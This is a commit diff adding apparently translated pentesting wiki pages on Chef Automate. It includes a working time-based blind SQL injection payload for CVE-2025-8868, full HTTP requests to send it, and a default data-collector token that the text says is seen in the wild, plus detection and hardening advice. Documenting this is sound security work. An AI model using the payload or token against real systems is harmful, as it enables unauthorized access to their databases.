Translated ['src/pentesting-ci-cd/chef-automate-security/README.md', 'sr

2026-02-04 19:11:41 -08:00 · 2025-09-30 19:22:27 +00:00
parent a353a8b3b0
commit 6f21e53d6d
3 changed files with 161 additions and 3 deletions
--- a/src/pentesting-ci-cd/chef-automate-security/README.md
+++ b/src/pentesting-ci-cd/chef-automate-security/README.md
@@ -0,0 +1,18 @@
+# Chef Automate 安全
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## 什么是 Chef Automate
+
+Chef Automate 是一个用于基础设施自动化、合规性和应用交付的平台。它暴露一个 web UI（通常为 Angular），通过 gRPC-Gateway 与后端 gRPC services 通信，提供类似 REST 的端点，路径例如 /api/v0/。
+
+- 常见的后端组件: gRPC services, PostgreSQL (often visible via pq: error prefixes), data-collector ingest service
+- 认证机制: user/API tokens and a data collector token header x-data-collector-token
+
+## Enumeration & Attacks
+
+{{#ref}}
+chef-automate-enumeration-and-attacks.md
+{{#endref}}
+
+{{#include ../../banners/hacktricks-training.md}}
--- a/src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md
+++ b/src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md
@@ -0,0 +1,142 @@
+# Chef Automate Enumeration & Attacks
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Overview
+
+本页汇集了针对 Chef Automate 实例进行枚举和攻击的实用技术，重点包括：
+- 发现 gRPC-Gateway-backed REST endpoints 并通过 validation/error responses 推断请求 schema
+- 在存在默认值时滥用 x-data-collector-token 认证头
+- 在 Compliance API 中的 Time-based blind SQL injection（CVE-2025-8868），影响 /api/v0/compliance/profiles/search 中的 filters[].type 字段
+
+> Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services.
+
+## Recon: Architecture and Fingerprints
+
+- Front-end: Often Angular。静态 bundle 可以提示 REST 路径（例如 /api/v0/...）
+- API transport: REST to gRPC via gRPC-Gateway
+- Responses may include grpc-metadata-content-type: application/grpc
+- Database/driver fingerprints:
+- Error bodies starting with pq: 强烈提示使用 PostgreSQL 和 Go pq driver
+- Interesting Compliance endpoints (auth required):
+- POST /api/v0/compliance/profiles/search
+- POST /api/v0/compliance/scanner/jobs/search
+
+## Auth: Data Collector Token (x-data-collector-token)
+
+Chef Automate 暴露了一个 data collector，通过专用头对请求进行认证：
+
+- Header: x-data-collector-token
+- Risk: 某些环境可能保留默认 token，从而获得对受保护 API 路由的访问权限。已在野外观察到的已知默认值：
+- 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
+
+如果存在，该 token 可用于调用本应受 auth 限制的 Compliance API 端点。强化时务必尝试轮换/禁用默认值。
+
+## API Schema Inference via Error-Driven Discovery
+
+gRPC-Gateway-backed 端点经常 leak 有用的 validation 错误，这些错误会描述期望的请求模型。
+
+For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:
+
+- type: string (filter field identifier)
+- values: array of strings
+
+Example request shape:
+```json
+{
+"filters": [
+{ "type": "name", "values": ["test"] }
+]
+}
+```
+格式错误的 JSON 或字段类型不正确通常会触发带有提示的 4xx/5xx 响应，且响应头会显示 gRPC-Gateway 的行为。使用这些信息映射字段并定位注入面。
+
+## 合规 API SQL Injection (CVE-2025-8868)
+
+- 受影响的端点: POST /api/v0/compliance/profiles/search
+- 注入点: filters[].type
+- 漏洞类别: time-based blind SQL injection in PostgreSQL
+- 根本原因: 在将 type 字段插入到动态 SQL 片段（可能用于构建 identifiers/WHERE clauses）时，缺乏正确的 parameterization/whitelisting。type 中的构造值会被 PostgreSQL 评估。
+
+有效的 time-based payload:
+```json
+{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
+```
+技术说明：
+- 用单引号关闭原始字符串
+- 连接一个调用 pg_sleep(N) 的子查询
+- 通过 || 重新进入字符串上下文，以便无论 type 嵌入何处，最终的 SQL 都保持语法有效
+
+### 通过差分延迟验证
+
+发送成对请求并比较响应时间以验证服务器端执行：
+
+- N = 1 秒
+```
+POST /api/v0/compliance/profiles/search HTTP/1.1
+Host: <target>
+Content-Type: application/json
+x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
+
+{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}
+```
+- N = 5 秒
+```
+POST /api/v0/compliance/profiles/search HTTP/1.1
+Host: <target>
+Content-Type: application/json
+x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
+
+{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
+```
+Observed behavior:
+- Response times scale with pg_sleep(N)
+- HTTP 500 responses may include pq: details during probing, confirming SQL execution paths
+
+> Tip: 使用 timing validator（例如，多次试验并用统计比较）来减少噪声和误报。
+
+### Impact
+
+Authenticated users—or unauthenticated actors abusing a default x-data-collector-token—can execute arbitrary SQL within Chef Automate’s PostgreSQL context, risking confidentiality and integrity of compliance profiles, configuration, and telemetry.
+
+### Affected versions / Fix
+
+- CVE: CVE-2025-8868
+- Upgrade guidance: Chef Automate 4.13.295 or later (Linux x86) per vendor advisories
+
+## Detection and Forensics
+
+- API layer:
+- Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
+- Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
+- Database layer (PostgreSQL):
+- Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
+- Authentication:
+- Log and alert on usage of x-data-collector-token, especially known default values, across API paths
+
+## Mitigations and Hardening
+
+- Immediate:
+- Rotate/disable default data collector tokens
+- Restrict ingress to data collector endpoints; enforce strong, unique tokens
+- Code-level:
+- Parameterize queries; never string-concatenate SQL fragments
+- Strictly whitelist allowed type values on the server (enum)
+- Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists
+
+## Practical Testing Checklist
+
+- Check if x-data-collector-token is accepted and whether the known default works
+- Map the Compliance API request schema by inducing validation errors and reading error messages/headers
+- Test for SQLi in less obvious “identifier-like” fields (e.g., filters[].type), not just values arrays or top-level text fields
+- Use time-based techniques with concatenation to keep SQL syntactically valid across contexts
+
+## References
+
+- [Cooking an SQL Injection Vulnerability in Chef Automate (XBOW blog)](https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate)
+- [Timing trace (XBOW)](https://xbow-website.pages.dev/traces/chef-automate-sql-injection/)
+- [CVE-2025-8868](https://www.cve.org/CVERecord?id=CVE-2025-8868)
+- [gRPC-Gateway](https://github.com/grpc-ecosystem/grpc-gateway)
+- [pq PostgreSQL driver for Go](https://github.com/lib/pq)
+
+{{#include ../../banners/hacktricks-training.md}}
--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
@@ -1,5 +1,3 @@
-# GCP - Post Exploitation
-
-{{#include ../../../banners/hacktricks-training.md}}
+# GCP - 后渗透

 {{#include ../../../banners/hacktricks-training.md}}